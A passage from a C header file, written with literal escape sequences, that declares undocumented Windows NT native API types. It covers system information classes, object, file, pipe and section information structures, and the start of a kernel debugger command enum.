133,\n\tSystemPolicyInformation = 
134,\n\tSystemHypervisorProcessorCountInformation = 135,\n\tSystemDeviceDataInformation = 136,\n\tSystemDeviceDataEnumerationInformation = 137,\n\tSystemMemoryTopologyInformation = 138,\n\tSystemMemoryChannelInformation = 139,\n\tSystemBootLogoInformation = 140,\n\tSystemProcessorPerformanceInformationEx = 141,\n\tSystemSpare0 = 142,\n\tSystemSecureBootPolicyInformation = 143,\n\tSystemPageFileInformationEx = 144,\n\tSystemSecureBootInformation = 145,\n\tSystemEntropyInterruptTimingRawInformation = 146,\n\tSystemPortableWorkspaceEfiLauncherInformation = 147,\n\tSystemFullProcessInformation = 148,\n\tSystemKernelDebuggerInformationEx = 149,\n\tSystemBootMetadataInformation = 150,\n\tSystemSoftRebootInformation = 151,\n\tSystemElamCertificateInformation = 152,\n\tSystemOfflineDumpConfigInformation = 153,\n\tSystemProcessorFeaturesInformation = 154,\n\tSystemRegistryReconciliationInformation = 155,\n\tSystemEdidInformation = 156,\n\tMaxSystemInfoClass = 157\n} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS;\n#endif\n\n/*\n** Timer START\n*/\n\n//\n// Timer APC routine definition.\n//\n\ntypedef VOID(*PTIMER_APC_ROUTINE) (\n\t_In_ PVOID TimerContext,\n\t_In_ ULONG TimerLowValue,\n\t_In_ LONG TimerHighValue\n\t);\n\ntypedef enum _TIMER_TYPE {\n\tNotificationTimer,\n\tSynchronizationTimer\n} TIMER_TYPE;\n\n#ifndef _TIMER_INFORMATION_CLASS\ntypedef enum _TIMER_INFORMATION_CLASS {\n\tTimerBasicInformation\n} TIMER_INFORMATION_CLASS;\n#endif\n\n#ifndef _TIMER_BASIC_INFORMATION\ntypedef struct _TIMER_BASIC_INFORMATION {\n\tLARGE_INTEGER RemainingTime;\n\tBOOLEAN TimerState;\n} TIMER_BASIC_INFORMATION, *PTIMER_BASIC_INFORMATION;\n#endif\n\n/*\n** Timer END\n*/\n\ntypedef VOID(NTAPI *PIO_APC_ROUTINE)(\n\t_In_ PVOID ApcContext,\n\t_In_ PIO_STATUS_BLOCK IoStatusBlock,\n\t_In_ ULONG Reserved\n\t);\n\ntypedef struct _OBJECT_DIRECTORY_INFORMATION {\n\tUNICODE_STRING Name;\n\tUNICODE_STRING TypeName;\n} OBJECT_DIRECTORY_INFORMATION, *POBJECT_DIRECTORY_INFORMATION;\n\n#ifndef 
InitializeObjectAttributes\n#define InitializeObjectAttributes( p, n, a, r, s ) { \\\n    (p)->Length = sizeof( OBJECT_ATTRIBUTES );          \\\n    (p)->RootDirectory = r;                             \\\n    (p)->Attributes = a;                                \\\n    (p)->ObjectName = n;                                \\\n    (p)->SecurityDescriptor = s;                        \\\n    (p)->SecurityQualityOfService = NULL;               \\\n    }\n\n//\n// Valid values for the Attributes field\n//\n\n#define OBJ_INHERIT             0x00000002L\n#define OBJ_PERMANENT           0x00000010L\n#define OBJ_EXCLUSIVE           0x00000020L\n#define OBJ_CASE_INSENSITIVE    0x00000040L\n#define OBJ_OPENIF              0x00000080L\n#define OBJ_OPENLINK            0x00000100L\n#define OBJ_KERNEL_HANDLE       0x00000200L\n#define OBJ_FORCE_ACCESS_CHECK  0x00000400L\n#define OBJ_VALID_ATTRIBUTES    0x000007F2L\n\n#endif\n\n\n/*\n** Objects START\n*/\n\n#ifndef _OBJECT_INFORMATION_CLASS\ntypedef enum _OBJECT_INFORMATION_CLASS {\n\tObjectBasicInformation,\n\tObjectNameInformation,\n\tObjectTypeInformation,\n\tObjectTypesInformation,\n\tObjectHandleFlagInformation,\n\tObjectSessionInformation,\n\tMaxObjectInfoClass\n} OBJECT_INFORMATION_CLASS;\n#endif\n\n#ifndef _OBJECT_BASIC_INFORMATION\ntypedef struct _OBJECT_BASIC_INFORMATION {\n\tULONG Attributes;\n\tACCESS_MASK GrantedAccess;\n\tULONG HandleCount;\n\tULONG PointerCount;\n\tULONG PagedPoolCharge;\n\tULONG NonPagedPoolCharge;\n\tULONG Reserved[3];\n\tULONG NameInfoSize;\n\tULONG TypeInfoSize;\n\tULONG SecurityDescriptorSize;\n\tLARGE_INTEGER CreationTime;\n} OBJECT_BASIC_INFORMATION, *POBJECT_BASIC_INFORMATION;\n#endif\n\n#ifndef _OBJECT_NAME_INFORMATION\ntypedef struct _OBJECT_NAME_INFORMATION {\n\tUNICODE_STRING Name;\n} OBJECT_NAME_INFORMATION, *POBJECT_NAME_INFORMATION;\n#endif\n\n#ifndef _OBJECT_TYPE_INFORMATION\ntypedef struct _OBJECT_TYPE_INFORMATION {\n\tUNICODE_STRING TypeName;\n\tULONG TotalNumberOfObjects;\n\tULONG 
TotalNumberOfHandles;\n\tULONG TotalPagedPoolUsage;\n\tULONG TotalNonPagedPoolUsage;\n\tULONG TotalNamePoolUsage;\n\tULONG TotalHandleTableUsage;\n\tULONG HighWaterNumberOfObjects;\n\tULONG HighWaterNumberOfHandles;\n\tULONG HighWaterPagedPoolUsage;\n\tULONG HighWaterNonPagedPoolUsage;\n\tULONG HighWaterNamePoolUsage;\n\tULONG HighWaterHandleTableUsage;\n\tULONG InvalidAttributes;\n\tGENERIC_MAPPING GenericMapping;\n\tULONG ValidAccessMask;\n\tBOOLEAN SecurityRequired;\n\tBOOLEAN MaintainHandleCount;\n\tULONG PoolType;\n\tULONG DefaultPagedPoolCharge;\n\tULONG DefaultNonPagedPoolCharge;\n} OBJECT_TYPE_INFORMATION, *POBJECT_TYPE_INFORMATION;\n#endif\n\ntypedef struct _OBJECT_TYPE_INFORMATION_8 {\n\tUNICODE_STRING TypeName;\n\tULONG TotalNumberOfObjects;\n\tULONG TotalNumberOfHandles;\n\tULONG TotalPagedPoolUsage;\n\tULONG TotalNonPagedPoolUsage;\n\tULONG TotalNamePoolUsage;\n\tULONG TotalHandleTableUsage;\n\tULONG HighWaterNumberOfObjects;\n\tULONG HighWaterNumberOfHandles;\n\tULONG HighWaterPagedPoolUsage;\n\tULONG HighWaterNonPagedPoolUsage;\n\tULONG HighWaterNamePoolUsage;\n\tULONG HighWaterHandleTableUsage;\n\tULONG InvalidAttributes;\n\tGENERIC_MAPPING GenericMapping;\n\tULONG ValidAccessMask;\n\tBOOLEAN SecurityRequired;\n\tBOOLEAN MaintainHandleCount;\n\tUCHAR TypeIndex;\n\tCHAR ReservedByte;\n\tULONG PoolType;\n\tULONG DefaultPagedPoolCharge;\n\tULONG DefaultNonPagedPoolCharge;\n} OBJECT_TYPE_INFORMATION_8, *POBJECT_TYPE_INFORMATION_8;\n\n#ifndef _OBJECT_TYPES_INFORMATION\ntypedef struct _OBJECT_TYPES_INFORMATION\n{\n\tULONG NumberOfTypes;\n\tOBJECT_TYPE_INFORMATION TypeInformation;\n} OBJECT_TYPES_INFORMATION, *POBJECT_TYPES_INFORMATION;\n#endif\n\n#ifndef _OBJECT_HANDLE_FLAG_INFORMATION\ntypedef struct _OBJECT_HANDLE_FLAG_INFORMATION\n{\n\tBOOLEAN Inherit;\n\tBOOLEAN ProtectFromClose;\n} OBJECT_HANDLE_FLAG_INFORMATION, *POBJECT_HANDLE_FLAG_INFORMATION;\n#endif\n/*\n** Objects END\n*/\n\n/*\n** File start\n*/\n\n#define FILE_SUPERSEDE                  
0x00000000\n#define FILE_OPEN                       0x00000001\n#define FILE_CREATE                     0x00000002\n#define FILE_OPEN_IF                    0x00000003\n#define FILE_OVERWRITE                  0x00000004\n#define FILE_OVERWRITE_IF               0x00000005\n#define FILE_MAXIMUM_DISPOSITION        0x00000005\n\n#define FILE_DIRECTORY_FILE                     0x00000001\n#define FILE_WRITE_THROUGH                      0x00000002\n#define FILE_SEQUENTIAL_ONLY                    0x00000004\n#define FILE_NO_INTERMEDIATE_BUFFERING          0x00000008\n\n#define FILE_SYNCHRONOUS_IO_ALERT               0x00000010\n#define FILE_SYNCHRONOUS_IO_NONALERT            0x00000020\n#define FILE_NON_DIRECTORY_FILE                 0x00000040\n#define FILE_CREATE_TREE_CONNECTION             0x00000080\n\n#define FILE_COMPLETE_IF_OPLOCKED               0x00000100\n#define FILE_NO_EA_KNOWLEDGE                    0x00000200\n#define FILE_OPEN_FOR_RECOVERY                  0x00000400\n#define FILE_RANDOM_ACCESS                      0x00000800\n\n#define FILE_DELETE_ON_CLOSE                    0x00001000\n#define FILE_OPEN_BY_FILE_ID                    0x00002000\n#define FILE_OPEN_FOR_BACKUP_INTENT             0x00004000\n#define FILE_NO_COMPRESSION                     0x00008000\n\n#define FILE_RESERVE_OPFILTER                   0x00100000\n#define FILE_OPEN_REPARSE_POINT                 0x00200000\n#define FILE_OPEN_NO_RECALL                     0x00400000\n#define FILE_OPEN_FOR_FREE_SPACE_QUERY          0x00800000\n\n\n#define FILE_COPY_STRUCTURED_STORAGE            0x00000041\n#define FILE_STRUCTURED_STORAGE                 0x00000441\n\n#define FILE_VALID_OPTION_FLAGS                 0x00ffffff\n#define FILE_VALID_PIPE_OPTION_FLAGS            0x00000032\n#define FILE_VALID_MAILSLOT_OPTION_FLAGS        0x00000032\n#define FILE_VALID_SET_FLAGS                    0x00000036\n\n#ifndef _FILE_INFORMATION_CLASS\ntypedef enum 
_FILE_INFORMATION_CLASS\n{\n\tFileDirectoryInformation = 1,\n\tFileFullDirectoryInformation,\n\tFileBothDirectoryInformation,\n\tFileBasicInformation,\n\tFileStandardInformation,\n\tFileInternalInformation,\n\tFileEaInformation,\n\tFileAccessInformation,\n\tFileNameInformation,\n\tFileRenameInformation,\n\tFileLinkInformation,\n\tFileNamesInformation,\n\tFileDispositionInformation,\n\tFilePositionInformation,\n\tFileFullEaInformation,\n\tFileModeInformation,\n\tFileAlignmentInformation,\n\tFileAllInformation,\n\tFileAllocationInformation,\n\tFileEndOfFileInformation,\n\tFileAlternateNameInformation,\n\tFileStreamInformation,\n\tFilePipeInformation,\n\tFilePipeLocalInformation,\n\tFilePipeRemoteInformation,\n\tFileMailslotQueryInformation,\n\tFileMailslotSetInformation,\n\tFileCompressionInformation,\n\tFileObjectIdInformation,\n\tFileCompletionInformation,\n\tFileMoveClusterInformation,\n\tFileQuotaInformation,\n\tFileReparsePointInformation,\n\tFileNetworkOpenInformation,\n\tFileAttributeTagInformation,\n\tFileTrackingInformation,\n\tFileIdBothDirectoryInformation,\n\tFileIdFullDirectoryInformation,\n\tFileValidDataLengthInformation,\n\tFileShortNameInformation,\n\tFileIoCompletionNotificationInformation,\n\tFileIoStatusBlockRangeInformation,\n\tFileIoPriorityHintInformation,\n\tFileSfioReserveInformation,\n\tFileSfioVolumeInformation,\n\tFileHardLinkInformation,\n\tFileProcessIdsUsingFileInformation,\n\tFileNormalizedNameInformation,\n\tFileNetworkPhysicalNameInformation,\n\tFileIdGlobalTxDirectoryInformation,\n\tFileMaximumInformation\n} FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS;\n#endif\n\n#ifndef _FILE_INFORMATION_CLASS\ntypedef enum _FSINFOCLASS {\n\tFileFsVolumeInformation = 
1,\n\tFileFsLabelInformation,\n\tFileFsSizeInformation,\n\tFileFsDeviceInformation,\n\tFileFsAttributeInformation,\n\tFileFsControlInformation,\n\tFileFsFullSizeInformation,\n\tFileFsObjectIdInformation,\n\tFileFsDriverPathInformation,\n\tFileFsVolumeFlagsInformation,\n\tFileFsMaximumInformation\n} FS_INFORMATION_CLASS, *PFS_INFORMATION_CLASS;\n#endif\n\ntypedef struct _FILE_BASIC_INFORMATION {\n\tLARGE_INTEGER CreationTime;\n\tLARGE_INTEGER LastAccessTime;\n\tLARGE_INTEGER LastWriteTime;\n\tLARGE_INTEGER ChangeTime;\n\tULONG FileAttributes;\n} FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION;\n\ntypedef struct _FILE_STANDARD_INFORMATION\n{\n\tLARGE_INTEGER AllocationSize;\n\tLARGE_INTEGER EndOfFile;\n\tULONG NumberOfLinks;\n\tUCHAR DeletePending;\n\tUCHAR Directory;\n} FILE_STANDARD_INFORMATION;\n\ntypedef struct _FILE_INTERNAL_INFORMATION {\n\tLARGE_INTEGER IndexNumber;\n} FILE_INTERNAL_INFORMATION, *PFILE_INTERNAL_INFORMATION;\n\ntypedef struct _FILE_EA_INFORMATION {\n\tULONG EaSize;\n} FILE_EA_INFORMATION, *PFILE_EA_INFORMATION;\n\ntypedef struct _FILE_ACCESS_INFORMATION {\n\tACCESS_MASK AccessFlags;\n} FILE_ACCESS_INFORMATION, *PFILE_ACCESS_INFORMATION;\n\ntypedef struct _FILE_POSITION_INFORMATION {\n\tLARGE_INTEGER CurrentByteOffset;\n} FILE_POSITION_INFORMATION, *PFILE_POSITION_INFORMATION;\n\ntypedef struct _FILE_MODE_INFORMATION {\n\tULONG Mode;\n} FILE_MODE_INFORMATION, *PFILE_MODE_INFORMATION;\n\ntypedef struct _FILE_ALIGNMENT_INFORMATION {\n\tULONG AlignmentRequirement;\n} FILE_ALIGNMENT_INFORMATION, *PFILE_ALIGNMENT_INFORMATION;\n\ntypedef struct _FILE_NAME_INFORMATION {\n\tULONG FileNameLength;\n\tWCHAR FileName[1];\n} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION;\n\ntypedef struct _FILE_ALL_INFORMATION {\n\tFILE_BASIC_INFORMATION BasicInformation;\n\tFILE_STANDARD_INFORMATION StandardInformation;\n\tFILE_INTERNAL_INFORMATION InternalInformation;\n\tFILE_EA_INFORMATION EaInformation;\n\tFILE_ACCESS_INFORMATION 
AccessInformation;\n\tFILE_POSITION_INFORMATION PositionInformation;\n\tFILE_MODE_INFORMATION ModeInformation;\n\tFILE_ALIGNMENT_INFORMATION AlignmentInformation;\n\tFILE_NAME_INFORMATION NameInformation;\n} FILE_ALL_INFORMATION, *PFILE_ALL_INFORMATION;\n\ntypedef struct _FILE_NETWORK_OPEN_INFORMATION {\n\tLARGE_INTEGER CreationTime;\n\tLARGE_INTEGER LastAccessTime;\n\tLARGE_INTEGER LastWriteTime;\n\tLARGE_INTEGER ChangeTime;\n\tLARGE_INTEGER AllocationSize;\n\tLARGE_INTEGER EndOfFile;\n\tULONG FileAttributes;\n} FILE_NETWORK_OPEN_INFORMATION, *PFILE_NETWORK_OPEN_INFORMATION;\n\ntypedef struct _FILE_ATTRIBUTE_TAG_INFORMATION {\n\tULONG FileAttributes;\n\tULONG ReparseTag;\n} FILE_ATTRIBUTE_TAG_INFORMATION, *PFILE_ATTRIBUTE_TAG_INFORMATION;\n\ntypedef struct _FILE_ALLOCATION_INFORMATION {\n\tLARGE_INTEGER AllocationSize;\n} FILE_ALLOCATION_INFORMATION, *PFILE_ALLOCATION_INFORMATION;\n\ntypedef struct _FILE_COMPRESSION_INFORMATION {\n\tLARGE_INTEGER CompressedFileSize;\n\tUSHORT CompressionFormat;\n\tUCHAR CompressionUnitShift;\n\tUCHAR ChunkShift;\n\tUCHAR ClusterShift;\n\tUCHAR Reserved[3];\n} FILE_COMPRESSION_INFORMATION, *PFILE_COMPRESSION_INFORMATION;\n\ntypedef struct _FILE_DISPOSITION_INFORMATION {\n\tBOOLEAN DeleteFile;\n} FILE_DISPOSITION_INFORMATION, *PFILE_DISPOSITION_INFORMATION;\n\ntypedef struct _FILE_END_OF_FILE_INFORMATION {\n\tLARGE_INTEGER EndOfFile;\n} FILE_END_OF_FILE_INFORMATION, *PFILE_END_OF_FILE_INFORMATION;\n\ntypedef struct _FILE_VALID_DATA_LENGTH_INFORMATION {\n\tLARGE_INTEGER ValidDataLength;\n} FILE_VALID_DATA_LENGTH_INFORMATION, *PFILE_VALID_DATA_LENGTH_INFORMATION;\n\ntypedef struct _FILE_LINK_INFORMATION {\n\tBOOLEAN ReplaceIfExists;\n\tHANDLE RootDirectory;\n\tULONG FileNameLength;\n\tWCHAR FileName[1];\n} FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION;\n\ntypedef struct _FILE_MOVE_CLUSTER_INFORMATION {\n\tULONG ClusterCount;\n\tHANDLE RootDirectory;\n\tULONG FileNameLength;\n\tWCHAR FileName[1];\n} FILE_MOVE_CLUSTER_INFORMATION, 
*PFILE_MOVE_CLUSTER_INFORMATION;\n\ntypedef struct _FILE_RENAME_INFORMATION {\n\tBOOLEAN ReplaceIfExists;\n\tHANDLE RootDirectory;\n\tULONG FileNameLength;\n\tWCHAR FileName[1];\n} FILE_RENAME_INFORMATION, *PFILE_RENAME_INFORMATION;\n\ntypedef struct _FILE_STREAM_INFORMATION {\n\tULONG NextEntryOffset;\n\tULONG StreamNameLength;\n\tLARGE_INTEGER StreamSize;\n\tLARGE_INTEGER StreamAllocationSize;\n\tWCHAR StreamName[1];\n} FILE_STREAM_INFORMATION, *PFILE_STREAM_INFORMATION;\n\ntypedef struct _FILE_TRACKING_INFORMATION {\n\tHANDLE DestinationFile;\n\tULONG ObjectInformationLength;\n\tCHAR ObjectInformation[1];\n} FILE_TRACKING_INFORMATION, *PFILE_TRACKING_INFORMATION;\n\ntypedef struct _FILE_COMPLETION_INFORMATION {\n\tHANDLE Port;\n\tPVOID Key;\n} FILE_COMPLETION_INFORMATION, *PFILE_COMPLETION_INFORMATION;\n\n//\n// Define the NamedPipeType flags for NtCreateNamedPipeFile\n//\n\n#define FILE_PIPE_BYTE_STREAM_TYPE      0x00000000\n#define FILE_PIPE_MESSAGE_TYPE          0x00000001\n\n//\n// Define the CompletionMode flags for NtCreateNamedPipeFile\n//\n\n#define FILE_PIPE_QUEUE_OPERATION       0x00000000\n#define FILE_PIPE_COMPLETE_OPERATION    0x00000001\n\n//\n// Define the ReadMode flags for NtCreateNamedPipeFile\n//\n\n#define FILE_PIPE_BYTE_STREAM_MODE      0x00000000\n#define FILE_PIPE_MESSAGE_MODE          0x00000001\n\n//\n// Define the NamedPipeConfiguration flags for NtQueryInformation\n//\n\n#define FILE_PIPE_INBOUND               0x00000000\n#define FILE_PIPE_OUTBOUND              0x00000001\n#define FILE_PIPE_FULL_DUPLEX           0x00000002\n\n//\n// Define the NamedPipeState flags for NtQueryInformation\n//\n\n#define FILE_PIPE_DISCONNECTED_STATE    0x00000001\n#define FILE_PIPE_LISTENING_STATE       0x00000002\n#define FILE_PIPE_CONNECTED_STATE       0x00000003\n#define FILE_PIPE_CLOSING_STATE         0x00000004\n\n//\n// Define the NamedPipeEnd flags for NtQueryInformation\n//\n\n#define FILE_PIPE_CLIENT_END            0x00000000\n#define 
FILE_PIPE_SERVER_END            0x00000001\n\n\ntypedef struct _FILE_PIPE_INFORMATION {\n\tULONG ReadMode;\n\tULONG CompletionMode;\n} FILE_PIPE_INFORMATION, *PFILE_PIPE_INFORMATION;\n\ntypedef struct _FILE_PIPE_LOCAL_INFORMATION {\n\tULONG NamedPipeType;\n\tULONG NamedPipeConfiguration;\n\tULONG MaximumInstances;\n\tULONG CurrentInstances;\n\tULONG InboundQuota;\n\tULONG ReadDataAvailable;\n\tULONG OutboundQuota;\n\tULONG WriteQuotaAvailable;\n\tULONG NamedPipeState;\n\tULONG NamedPipeEnd;\n} FILE_PIPE_LOCAL_INFORMATION, *PFILE_PIPE_LOCAL_INFORMATION;\n\ntypedef struct _FILE_PIPE_REMOTE_INFORMATION {\n\tLARGE_INTEGER CollectDataTime;\n\tULONG MaximumCollectionCount;\n} FILE_PIPE_REMOTE_INFORMATION, *PFILE_PIPE_REMOTE_INFORMATION;\n\ntypedef struct _FILE_MAILSLOT_QUERY_INFORMATION {\n\tULONG MaximumMessageSize;\n\tULONG MailslotQuota;\n\tULONG NextMessageSize;\n\tULONG MessagesAvailable;\n\tLARGE_INTEGER ReadTimeout;\n} FILE_MAILSLOT_QUERY_INFORMATION, *PFILE_MAILSLOT_QUERY_INFORMATION;\n\ntypedef struct _FILE_MAILSLOT_SET_INFORMATION {\n\tPLARGE_INTEGER ReadTimeout;\n} FILE_MAILSLOT_SET_INFORMATION, *PFILE_MAILSLOT_SET_INFORMATION;\n\ntypedef struct _FILE_REPARSE_POINT_INFORMATION {\n\tLONGLONG FileReference;\n\tULONG Tag;\n} FILE_REPARSE_POINT_INFORMATION, *PFILE_REPARSE_POINT_INFORMATION;\n\n//\n// Define the flags for NtSet(Query)EaFile service structure entries\n//\n\n#define FILE_NEED_EA                    0x00000080\n\n//\n// Define EA type values\n//\n\n#define FILE_EA_TYPE_BINARY             0xfffe\n#define FILE_EA_TYPE_ASCII              0xfffd\n#define FILE_EA_TYPE_BITMAP             0xfffb\n#define FILE_EA_TYPE_METAFILE           0xfffa\n#define FILE_EA_TYPE_ICON               0xfff9\n#define FILE_EA_TYPE_EA                 0xffee\n#define FILE_EA_TYPE_MVMT               0xffdf\n#define FILE_EA_TYPE_MVST               0xffde\n#define FILE_EA_TYPE_ASN1               0xffdd\n#define FILE_EA_TYPE_FAMILY_IDS         0xff01\n\ntypedef struct 
_FILE_FULL_EA_INFORMATION {\n\tULONG NextEntryOffset;\n\tUCHAR Flags;\n\tUCHAR EaNameLength;\n\tUSHORT EaValueLength;\n\tCHAR EaName[1];\n} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;\n\ntypedef struct _FILE_GET_EA_INFORMATION {\n\tULONG NextEntryOffset;\n\tUCHAR EaNameLength;\n\tCHAR EaName[1];\n} FILE_GET_EA_INFORMATION, *PFILE_GET_EA_INFORMATION;\n\ntypedef struct _FILE_GET_QUOTA_INFORMATION {\n\tULONG NextEntryOffset;\n\tULONG SidLength;\n\tSID Sid;\n} FILE_GET_QUOTA_INFORMATION, *PFILE_GET_QUOTA_INFORMATION;\n\ntypedef struct _FILE_QUOTA_INFORMATION {\n\tULONG NextEntryOffset;\n\tULONG SidLength;\n\tLARGE_INTEGER ChangeTime;\n\tLARGE_INTEGER QuotaUsed;\n\tLARGE_INTEGER QuotaThreshold;\n\tLARGE_INTEGER QuotaLimit;\n\tSID Sid;\n} FILE_QUOTA_INFORMATION, *PFILE_QUOTA_INFORMATION;\n\ntypedef struct _FILE_DIRECTORY_INFORMATION {\n\tULONG NextEntryOffset;\n\tULONG FileIndex;\n\tLARGE_INTEGER CreationTime;\n\tLARGE_INTEGER LastAccessTime;\n\tLARGE_INTEGER LastWriteTime;\n\tLARGE_INTEGER ChangeTime;\n\tLARGE_INTEGER EndOfFile;\n\tLARGE_INTEGER AllocationSize;\n\tULONG FileAttributes;\n\tULONG FileNameLength;\n\tWCHAR FileName[1];\n} FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION;\n\ntypedef struct _FILE_FULL_DIR_INFORMATION {\n\tULONG NextEntryOffset;\n\tULONG FileIndex;\n\tLARGE_INTEGER CreationTime;\n\tLARGE_INTEGER LastAccessTime;\n\tLARGE_INTEGER LastWriteTime;\n\tLARGE_INTEGER ChangeTime;\n\tLARGE_INTEGER EndOfFile;\n\tLARGE_INTEGER AllocationSize;\n\tULONG FileAttributes;\n\tULONG FileNameLength;\n\tULONG EaSize;\n\tWCHAR FileName[1];\n} FILE_FULL_DIR_INFORMATION, *PFILE_FULL_DIR_INFORMATION;\n\ntypedef struct _FILE_ID_FULL_DIR_INFORMATION {\n\tULONG NextEntryOffset;\n\tULONG FileIndex;\n\tLARGE_INTEGER CreationTime;\n\tLARGE_INTEGER LastAccessTime;\n\tLARGE_INTEGER LastWriteTime;\n\tLARGE_INTEGER ChangeTime;\n\tLARGE_INTEGER EndOfFile;\n\tLARGE_INTEGER AllocationSize;\n\tULONG FileAttributes;\n\tULONG FileNameLength;\n\tULONG 
EaSize;\n\tLARGE_INTEGER FileId;\n\tWCHAR FileName[1];\n} FILE_ID_FULL_DIR_INFORMATION, *PFILE_ID_FULL_DIR_INFORMATION;\n\ntypedef struct _FILE_BOTH_DIR_INFORMATION {\n\tULONG NextEntryOffset;\n\tULONG FileIndex;\n\tLARGE_INTEGER CreationTime;\n\tLARGE_INTEGER LastAccessTime;\n\tLARGE_INTEGER LastWriteTime;\n\tLARGE_INTEGER ChangeTime;\n\tLARGE_INTEGER EndOfFile;\n\tLARGE_INTEGER AllocationSize;\n\tULONG FileAttributes;\n\tULONG FileNameLength;\n\tULONG EaSize;\n\tCCHAR ShortNameLength;\n\tWCHAR ShortName[12];\n\tWCHAR FileName[1];\n} FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION;\n\ntypedef struct _FILE_ID_BOTH_DIR_INFORMATION {\n\tULONG NextEntryOffset;\n\tULONG FileIndex;\n\tLARGE_INTEGER CreationTime;\n\tLARGE_INTEGER LastAccessTime;\n\tLARGE_INTEGER LastWriteTime;\n\tLARGE_INTEGER ChangeTime;\n\tLARGE_INTEGER EndOfFile;\n\tLARGE_INTEGER AllocationSize;\n\tULONG FileAttributes;\n\tULONG FileNameLength;\n\tULONG EaSize;\n\tCCHAR ShortNameLength;\n\tWCHAR ShortName[12];\n\tLARGE_INTEGER FileId;\n\tWCHAR FileName[1];\n} FILE_ID_BOTH_DIR_INFORMATION, *PFILE_ID_BOTH_DIR_INFORMATION;\n\ntypedef struct _FILE_NAMES_INFORMATION {\n\tULONG NextEntryOffset;\n\tULONG FileIndex;\n\tULONG FileNameLength;\n\tWCHAR FileName[1];\n} FILE_NAMES_INFORMATION, *PFILE_NAMES_INFORMATION;\n\ntypedef struct _FILE_OBJECTID_INFORMATION {\n\tLONGLONG FileReference;\n\tUCHAR ObjectId[16];\n\tunion {\n\t\tstruct {\n\t\t\tUCHAR BirthVolumeId[16];\n\t\t\tUCHAR BirthObjectId[16];\n\t\t\tUCHAR DomainId[16];\n\t\t};\n\t\tUCHAR ExtendedInfo[48];\n\t};\n} FILE_OBJECTID_INFORMATION, *PFILE_OBJECTID_INFORMATION;\n\ntypedef struct _FILE_FS_VOLUME_INFORMATION {\n\tLARGE_INTEGER VolumeCreationTime;\n\tULONG         VolumeSerialNumber;\n\tULONG         VolumeLabelLength;\n\tBOOLEAN       SupportsObjects;\n\tWCHAR         VolumeLabel[1];\n} FILE_FS_VOLUME_INFORMATION, *PFILE_FS_VOLUME_INFORMATION;\n\n/*\n** File END\n*/\n\n/*\n** Section START\n*/\n\n#ifndef _SECTION_INFORMATION_CLASS\ntypedef 
enum _SECTION_INFORMATION_CLASS {\n\tSectionBasicInformation,\n\tSectionImageInformation,\n\tSectionRelocationInformation,\n\tMaxSectionInfoClass\n} SECTION_INFORMATION_CLASS;\n#endif\n\ntypedef struct _SECTIONBASICINFO {\n\tPVOID BaseAddress;\n\tULONG AllocationAttributes;\n\tLARGE_INTEGER MaximumSize;\n} SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION;\n\ntypedef struct _SECTION_IMAGE_INFORMATION {\n\tPVOID TransferAddress;\n\tULONG ZeroBits;\n\tSIZE_T MaximumStackSize;\n\tSIZE_T CommittedStackSize;\n\tULONG SubSystemType;\n\tunion {\n\t\tstruct {\n\t\t\tUSHORT SubSystemMinorVersion;\n\t\t\tUSHORT SubSystemMajorVersion;\n\t\t};\n\t\tULONG SubSystemVersion;\n\t};\n\tULONG GpValue;\n\tUSHORT ImageCharacteristics;\n\tUSHORT DllCharacteristics;\n\tUSHORT Machine;\n\tBOOLEAN ImageContainsCode;\n\tBOOLEAN Spare1;\n\tULONG LoaderFlags;\n\tULONG ImageFileSize;\n\tULONG Reserved[1];\n} SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION;\n\ntypedef struct _SECTION_IMAGE_INFORMATION64 {\n\tULONGLONG TransferAddress;\n\tULONG ZeroBits;\n\tULONGLONG MaximumStackSize;\n\tULONGLONG CommittedStackSize;\n\tULONG SubSystemType;\n\tunion {\n\t\tstruct {\n\t\t\tUSHORT SubSystemMinorVersion;\n\t\t\tUSHORT SubSystemMajorVersion;\n\t\t};\n\t\tULONG SubSystemVersion;\n\t};\n\tULONG GpValue;\n\tUSHORT ImageCharacteristics;\n\tUSHORT DllCharacteristics;\n\tUSHORT Machine;\n\tBOOLEAN ImageContainsCode;\n\tBOOLEAN Spare1;\n\tULONG LoaderFlags;\n\tULONG ImageFileSize;\n\tULONG Reserved[1];\n} SECTION_IMAGE_INFORMATION64, *PSECTION_IMAGE_INFORMATION64;\n\ntypedef enum _SECTION_INHERIT {\n\tViewShare = 1,\n\tViewUnmap = 2\n} SECTION_INHERIT;\n\n#define SEC_BASED          0x200000\n#define SEC_NO_CHANGE      0x400000\n#define SEC_FILE           0x800000     \n#define SEC_IMAGE         0x1000000     \n#define SEC_RESERVE       0x4000000     \n#define SEC_COMMIT        0x8000000     \n#define SEC_NOCACHE      0x10000000     \n#define SEC_GLOBAL       0x20000000\n#define SEC_LARGE_PAGES 
 0x80000000    \n\n/*\n** Section END\n*/\n\n/*\n** Kernel Debugger START\n*/\n\n#ifndef _SYSDBG_COMMAND\ntypedef enum _SYSDBG_COMMAND {\n\tSysDbgQueryModuleInformation,\n\tSysDbgQueryTraceInformation,\n\tSysDbgSetTracepoint,\n\tSysDbgSetSpecialCall,\n\tSysDbgClearSpecialCalls,\n\tSysDbgQuerySpecialCalls,\n\tSysDbgBreakPoint,\n\tSysDbgQueryVersion,\n\tSysDbgReadVirtual,\n\tSysDbgWriteVirtual,\n\tSysDbgReadPhysical,\n\tSysDbgWritePhysical,\n\tSysDbgReadControlSpace,\n\tSysDbgWriteControlSpace,\n\tSysDbgReadIoSpace,\n\tSysDbgWriteIoSpace,\n\tSysDbgReadMsr,\n\tSysDbgWriteMsr,\n\tSysDbgReadBusData,\n\tSysDbgWriteBusData,\n\tSysDbgCheckLowMemory,\n\tSysDbgEnableKernelDebugger,\n\tSysDbgDisableKernelDebugger,\n\tSysDbgGetAutoKdEnable,\n\tSysDbgSetAutoKdEnable,\n\tSysDbgGetPrintBufferSize,\n\tSysDbgSetPrintBufferSize,\n\tSysDbgGetKdUmExceptionEnable,\n\tSysDbgSetKdUmExceptionEnable,\n\tSysDbgGetTriageDump,\n